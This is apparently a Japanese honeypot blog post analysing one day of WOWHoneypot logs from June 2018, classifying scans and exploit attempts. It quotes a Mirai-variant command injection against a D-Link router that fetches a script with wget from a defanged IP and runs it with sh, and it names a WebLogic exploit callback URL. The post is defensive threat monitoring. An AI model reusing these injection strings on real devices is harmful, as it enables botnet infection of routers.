S-Owl

S(ecurity)Owl

トップ > honeypot > WOWHoneypot簡易分析(21日目)

WOWHoneypot簡易分析(21日目)

honeypot

WOWhoneypotの2018/6/24(日)(運用21日目)の簡易分析です。

本日の総アクセス件数は397件です。

73 [2018-06-24 "HEAD /
45 [2018-06-24 "GET /
6 [2018-06-24 "GET /xampp/phpmyadmin/index.php
6 [2018-06-24 "GET /www/phpMyAdmin/index.php
6 [2018-06-24 "GET /web/phpMyAdmin/index.php
6 [2018-06-24 "GET /typo3/phpmyadmin/index.php
6 [2018-06-24 "GET /tools/phpMyAdmin/index.php
6 [2018-06-24 "GET /pmd/index.php
6 [2018-06-24 "GET /pma-old/index.php
6 [2018-06-24 "GET /pmamy/index.php
6 [2018-06-24 "GET /pmamy2/index.php
6 [2018-06-24 "GET /PMA/index.php
6 [2018-06-24 "GET /PMA2/index.php
6 [2018-06-24 "GET /phpMyAdmin/phpMyAdmin/index.php
6 [2018-06-24 "GET /phpmyadmin/phpmyadmin/index.php
6 [2018-06-24 "GET /phpMyAdminold/index.php
6 [2018-06-24 "GET /phpMyAdmin.old/index.php
6 [2018-06-24 "GET /phpmyadmin-old/index.php
6 [2018-06-24 "GET /phpMyAdmin/index.php
6 [2018-06-24 "GET /phpmyadmin/index.php
6 [2018-06-24 "GET /phpMyadmin_bak/index.php
6 [2018-06-24 "GET /phpmyadmin2/index.php
6 [2018-06-24 "GET /phpmyadmin1/index.php
6 [2018-06-24 "GET /phpmyadmin0/index.php
6 [2018-06-24 "GET /phpma/index.php
6 [2018-06-24 "GET /phpadmin/index.php
6 [2018-06-24 "GET /mysql/index.php
6 [2018-06-24 "GET /mysqladmin/index.php
6 [2018-06-24 "GET /mysql-admin/index.php
6 [2018-06-24 "GET /myadmin/index.php
6 [2018-06-24 "GET /myadmin2/index.php
6 [2018-06-24 "GET /index.php
6 [2018-06-24 "GET /db/index.php
6 [2018-06-24 "GET /dbadmin/index.php
6 [2018-06-24 "GET /claroline/phpMyAdmin/index.php
6 [2018-06-24 "GET /admin/PMA/index.php
6 [2018-06-24 "GET /admin/pma/index.php
6 [2018-06-24 "GET /admin/phpMyAdmin/index.php
6 [2018-06-24 "GET /admin/phpmyadmin/index.php
6 [2018-06-24 "GET /admin/phpmyadmin2/index.php
6 [2018-06-24 "GET /admin/mysql/index.php
6 [2018-06-24 "GET /admin/mysql2/index.php
6 [2018-06-24 "GET /admin/index.php
5 [2018-06-24 "GET /pma/index.php
3 [2018-06-24 "PROPFIND /
2 [2018-06-24 "POST /wls-wsat/CoordinatorPortType
2 [2018-06-24 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 [2018-06-24 "POST /xx.php
1 [2018-06-24 "POST /xw.php
1 [2018-06-24 "POST /wuwu11.php
1 [2018-06-24 "POST /w.php
1 [2018-06-24 "POST /s.php
1 [2018-06-24 "POST /sheep.php
1 [2018-06-24 "POST /db_session.init.php
1 [2018-06-24 "POST /db.init.php
1 [2018-06-24 "GET /webdav/
1 [2018-06-24 "GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 [2018-06-24 "GET /setup.php
1 [2018-06-24 "GET /scripts/setup.php
1 [2018-06-24 "GET /pma/scripts/setup.php
1 [2018-06-24 "GET /phpMyAdmin/scripts/setup.php
1 [2018-06-24 "GET /phpmyadmin/scripts/setup.php
1 [2018-06-24 "GET /mysqladmin/scripts/setup.php
1 [2018-06-24 "GET /myAdmin/scripts/setup.php
1 [2018-06-24 "GET /myadmin/scripts/setup.php
1 [2018-06-24 "GET /manager/html
1 [2018-06-24 "GET hxxp://114.215.240[.]151:83/index.php
1 [2018-06-24 "GET hxxp://114.215.207[.]183:83/index.php 

 phpMyAdmin関連(261件)と/を除外します。全て既知のものです。

2 POST /wls-wsat/CoordinatorPortType   … Weblogic脆弱性を突く攻撃
2 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$  … ルータD-Linkの脆弱性を突くMirai亜種の攻撃
1 GET /webdav/  … WebDAVの調査行為
1 POST /wuwu11.php  … php脆弱性を突く調査(詳細不明)
1 POST /xw.php  … php脆弱性を突く調査(詳細不明)
1 POST /xx.php  … php脆弱性を突く調査(詳細不明)
1 POST /s.php  … php脆弱性を突く調査(詳細不明)
1 POST /w.php  … php脆弱性を突く調査(詳細不明)
1 POST /db.init.php  … php脆弱性を突く調査(詳細不明)
1 POST /db_session.init.php  … php脆弱性を突く調査(詳細不明)
1 POST /sheep.php  … php脆弱性を突く調査(詳細不明)
1 GET /w00tw00t.at.blackhats.romanian.anti-sec:)  … 脆弱性ツールZmEuのスキャン行為
1 GET /manager/html  … Tomcatの管理画面の調査行為
1 GET hxxp://114.215.240[.]151:83/index.php  … プロキシの調査行為
1 GET hxxp://114.215.207[.]183:83/index.php   … プロキシの調査行為

久々のWeblogic脆弱性を突くものは、脆弱性があった場合には、以下へ通信が発生します。
IPは変わっていますが、それ以外の攻撃コードが同一のため、同じアクターが基盤を変えながら攻撃を行っているものと思われます。

hxxp://120.25.148[.]202/images/test/DL[.]php

 

本日のハンティングログは以下です。Mirai亜種のものです。

2 [2018-06-24 wget hxxp://185.62.190[.]191/r

以上です。